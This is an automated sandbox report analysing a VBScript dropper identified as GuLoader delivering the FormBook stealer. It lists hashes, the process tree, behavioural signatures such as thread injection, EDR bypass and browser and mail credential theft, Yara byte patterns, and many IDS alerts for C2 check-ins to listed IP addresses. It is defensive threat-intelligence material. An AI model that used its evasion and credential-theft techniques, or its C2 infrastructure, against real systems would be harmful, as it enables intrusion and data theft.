Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs

Overview

General Information

Sample name:#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs
Analysis ID:1499548
MD5:62f8514c35c5abc8a6138ff3029a9af7
SHA1:9835d6cc79ed8cc63c13171cfd9d87efec7467a0
SHA256:15c644bdde76746a5798daa41fc25ac5f2a999d1fe6e11b1e47f7b328e7a1722
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found stalling execution ending in API Sleep call
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 5232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • x.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 36EFC401E52E98CD1C735D8A767A1E6D)
      • x.exe (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 36EFC401E52E98CD1C735D8A767A1E6D)
        • kCwueywDTS.exe (PID: 7976 cmdline: "C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • cmdkey.exe (PID: 7296 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
            • kCwueywDTS.exe (PID: 7116 cmdline: "C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 6656 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", ProcessId: 5232, ProcessName: wscript.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs", ProcessId: 5232, ProcessName: wscript.exe

        Suricata Signatures

        Timestamp:2024-08-27T08:05:03.914656+0200
        SID:2855464
        Severity:1
        Source Port:49926
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:01:05.754850+0200
        SID:2855464
        Severity:1
        Source Port:49886
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:52.347239+0200
        SID:2855464
        Severity:1
        Source Port:49905
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:29.943422+0200
        SID:2855464
        Severity:1
        Source Port:49876
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:06.794690+0200
        SID:2855464
        Severity:1
        Source Port:49852
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:13.071084+0200
        SID:2855464
        Severity:1
        Source Port:49871
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:43.272478+0200
        SID:2855464
        Severity:1
        Source Port:49880
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:57:27.852650+0200
        SID:2803270
        Severity:2
        Source Port:49840
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-27T08:00:37.994808+0200
        SID:2855464
        Severity:1
        Source Port:49878
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:56:31.449828+0200
        SID:2035065
        Severity:1
        Source Port:80
        Destination Port:49897
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T07:56:31.449828+0200
        SID:2855464
        Severity:1
        Source Port:49891
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:56:31.449828+0200
        SID:2855464
        Severity:1
        Source Port:49932
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:56:31.449828+0200
        SID:2855464
        Severity:1
        Source Port:49934
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:56:31.449828+0200
        SID:2855464
        Severity:1
        Source Port:49933
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:58:24.994150+0200
        SID:2855464
        Severity:1
        Source Port:49842
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:51.831882+0200
        SID:2855464
        Severity:1
        Source Port:49882
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:44.637737+0200
        SID:2855464
        Severity:1
        Source Port:49863
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:05:17.802841+0200
        SID:2855464
        Severity:1
        Source Port:49930
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:08.526914+0200
        SID:2855464
        Severity:1
        Source Port:49910
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:01:19.172926+0200
        SID:2855464
        Severity:1
        Source Port:49890
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:55.113825+0200
        SID:2855464
        Severity:1
        Source Port:49906
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:05:01.056269+0200
        SID:2855464
        Severity:1
        Source Port:49925
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:58:52.502095+0200
        SID:2855464
        Severity:1
        Source Port:49848
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:35.769154+0200
        SID:2855464
        Severity:1
        Source Port:49900
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:01:10.930779+0200
        SID:2855464
        Severity:1
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:20.337134+0200
        SID:2855464
        Severity:1
        Source Port:49856
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:16.639680+0200
        SID:2855464
        Severity:1
        Source Port:49897
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:46.450056+0200
        SID:2855464
        Severity:1
        Source Port:49921
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:56.100695+0200
        SID:2855464
        Severity:1
        Source Port:49866
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:32.544955+0200
        SID:2855464
        Severity:1
        Source Port:49917
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:33.600505+0200
        SID:2855464
        Severity:1
        Source Port:49860
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:58:47.168777+0200
        SID:2855464
        Severity:1
        Source Port:49846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:41.115882+0200
        SID:2855464
        Severity:1
        Source Port:49902
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:49.253905+0200
        SID:2855464
        Severity:1
        Source Port:49922
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:54.579089+0200
        SID:2855464
        Severity:1
        Source Port:49883
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:38.442062+0200
        SID:2855464
        Severity:1
        Source Port:49901
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:41.945928+0200
        SID:2855464
        Severity:1
        Source Port:49862
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:05.899545+0200
        SID:2855464
        Severity:1
        Source Port:49909
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:29.841545+0200
        SID:2855464
        Severity:1
        Source Port:49916
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:03.267187+0200
        SID:2855464
        Severity:1
        Source Port:49908
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:31.128997+0200
        SID:2855464
        Severity:1
        Source Port:49859
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:58.240454+0200
        SID:2855464
        Severity:1
        Source Port:49924
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:40.633351+0200
        SID:2855464
        Severity:1
        Source Port:49879
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:01.196227+0200
        SID:2855464
        Severity:1
        Source Port:49850
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:04.039854+0200
        SID:2855464
        Severity:1
        Source Port:49851
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:27.228786+0200
        SID:2855464
        Severity:1
        Source Port:49875
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:19.345694+0200
        SID:2855464
        Severity:1
        Source Port:49898
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:58:28.599071+0200
        SID:2855464
        Severity:1
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:35.244334+0200
        SID:2855464
        Severity:1
        Source Port:49918
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:13.760882+0200
        SID:2855464
        Severity:1
        Source Port:49896
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:17.715231+0200
        SID:2855464
        Severity:1
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:01.684344+0200
        SID:2855464
        Severity:1
        Source Port:49868
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:15.080980+0200
        SID:2855464
        Severity:1
        Source Port:49854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:43.653288+0200
        SID:2855464
        Severity:1
        Source Port:49920
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:10.236932+0200
        SID:2855464
        Severity:1
        Source Port:49870
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:58:49.833549+0200
        SID:2855464
        Severity:1
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:57.342683+0200
        SID:2855464
        Severity:1
        Source Port:49884
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:16.565560+0200
        SID:2855464
        Severity:1
        Source Port:49912
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:19.188671+0200
        SID:2855464
        Severity:1
        Source Port:49913
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:28.483073+0200
        SID:2855464
        Severity:1
        Source Port:49858
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:24.460006+0200
        SID:2855464
        Severity:1
        Source Port:49874
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:04:21.679269+0200
        SID:2855464
        Severity:1
        Source Port:49914
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:01:24.458065+0200
        SID:2855464
        Severity:1
        Source Port:49892
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:47.339867+0200
        SID:2855464
        Severity:1
        Source Port:49864
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:05:12.296959+0200
        SID:2855464
        Severity:1
        Source Port:49928
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:58:30.561454+0200
        SID:2855464
        Severity:1
        Source Port:49844
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:00:15.956015+0200
        SID:2855464
        Severity:1
        Source Port:49872
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:05:15.074084+0200
        SID:2855464
        Severity:1
        Source Port:49929
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:03:49.519118+0200
        SID:2855464
        Severity:1
        Source Port:49904
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T07:59:58.889890+0200
        SID:2855464
        Severity:1
        Source Port:49867
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T08:01:08.416293+0200
        SID:2855464
        Severity:1
        Source Port:49887
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1305039
        Multi AV Scanner detection for submitted file
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsVirustotal: Detection: 12%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49840 version: TLS 1.2
        Source: Binary string: wntdll.pdb source: x.exe, cmdkey.exe
        Source: C:\Users\user\AppData\Local\Temp\x.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040627E FindFirstFileA,FindClose,2_2_0040627E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004063BE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_004063BE
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A4C710 FindFirstFileW,FindNextFileW,FindClose,5_2_00A4C710
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then xor eax, eax5_2_00A39B50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then mov ebx, 00000004h5_2_033304E8

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49842 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49851 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49850 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49846 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49858 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49855 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49854 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49852 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49866 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49856 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49860 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49871 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49864 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49879 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49914 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49900 -> 96.126.123.244:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49905 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49884 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49913 -> 172.67.166.145:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49872 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49920 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49924 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49862 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49925 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49922 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49867 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49928 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49868 -> 18.183.3.45:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49870 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49874 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49886 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49878 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49875 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49890 -> 76.223.54.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49904 -> 23.231.158.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49887 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49880 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49909 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49892 -> 76.223.54.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49916 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49882 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49896 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49888 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49912 -> 172.67.166.145:80
